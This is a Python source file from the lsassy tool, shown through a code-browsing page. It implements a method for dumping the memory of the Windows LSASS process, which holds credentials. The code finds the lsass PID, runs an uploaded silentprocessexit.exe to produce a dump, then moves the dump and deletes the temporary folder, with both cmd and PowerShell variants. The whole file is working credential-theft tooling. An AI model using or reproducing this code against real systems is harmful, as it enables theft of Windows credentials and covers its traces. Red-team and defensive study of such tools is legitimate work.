Codebase list python-lsassy / ab10e50d-9369-4d46-a516-4ad15769b19e/upstream/3.1.6 lsassy / dumpmethod / silentprocessexit.py
ab10e50d-9369-4d46-a516-4ad15769b19e/upstream/3.1.6

Tree @ab10e50d-9369-4d46-a516-4ad15769b19e/upstream/3.1.6 (Download .tar.gz)

silentprocessexit.py @ab10e50d-9369-4d46-a516-4ad15769b19e/upstream/3.1.6raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from lsassy.dumpmethod import IDumpMethod, Dependency


class DumpMethod(IDumpMethod):
    #need_debug_privilege = True


    def __init__(self, session, timeout, time_between_commands):
        super().__init__(session, timeout, time_between_commands)
        self.silentprocessexit = Dependency("silentprocessexit", "silentprocessexit.exe")

    def prepare(self, options):
        return self.prepare_dependencies(options, [self.silentprocessexit])

    def clean(self):
        self.clean_dependencies([self.silentprocessexit])

    def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
        cmd_command = [
	        """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do {} %J 0""".format(
	            self.silentprocessexit.get_remote_path()
	        ),
	        """move C:\\temp\\lsass.exe-(PID-* C:\\Temp\\lsass && move C:\\Temp\\lsass\\lsass.exe*.dmp {}{} """.format(self.dump_path, self.dump_name),
	        """del /s /q "C:\\temp\\lsass" && rmdir C:\\Temp\\lsass"""
        ]
        pwsh_command = [
        	"{} (Get-Process lsass).Id 0".format(
            	self.silentprocessexit.get_remote_path()
            ),
			"""move C:\\temp\\lsass.exe-(PID-* C:\\Temp\\lsass && move C:\\Temp\\lsass\\lsass.exe*.dmp {}{} """.format(self.dump_path, self.dump_name),
	        """del /s /q "C:\\temp\\lsass" && rmdir C:\\Temp\\lsass"""        ]
        return {
            "cmd": cmd_command,
            "pwsh": pwsh_command
        }